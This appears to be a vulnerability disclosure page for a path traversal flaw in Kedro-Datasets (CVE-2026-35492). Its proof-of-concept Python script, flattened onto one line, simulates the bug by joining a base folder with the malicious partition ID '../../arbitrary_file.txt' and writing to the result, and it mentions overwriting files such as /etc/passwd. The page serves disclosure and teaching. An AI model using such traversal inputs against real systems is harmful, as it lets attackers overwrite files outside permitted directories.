CVE-2026-35492: Kedro-Datasets路径遍历漏洞

import os # Proof of Concept for CVE-2026-35492 Path Traversal # This simulates the vulnerable behavior in Kedro-Datasets < 9.3.0 def vulnerable_save(base_path, partition_id, data): # Simulate the vulnerable code logic: direct concatenation without validation # In the actual library, this leads to writing outside the intended directory full_path = os.path.join(base_path, partition_id) # Check if the path is normalized (which the vulnerable code fails to enforce properly) print(f"[VULNERABLE] Attempting to write to: {full_path}") # In a real scenario, this would write 'data' to 'full_path' # potentially overwriting sensitive files like ../../etc/passwd with open(full_path, 'w') as f: f.write(str(data)) # Configuration base_directory = "./safe_dataset_folder" # Malicious partition ID containing path traversal sequences malicious_input = "../../arbitrary_file.txt" print(f"Base Directory: {base_directory}") print(f"User Partition ID: {malicious_input}") # Execute the vulnerable operation # This would result in writing to ./arbitrary_file.txt instead of ./safe_dataset_folder/... vulnerable_save(base_directory, malicious_input, "MALICIOUS_PAYLOAD")